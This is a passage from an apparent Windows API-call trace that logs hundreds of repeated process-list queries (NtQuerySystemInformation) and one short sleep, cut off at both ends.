NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.630] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0246.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, 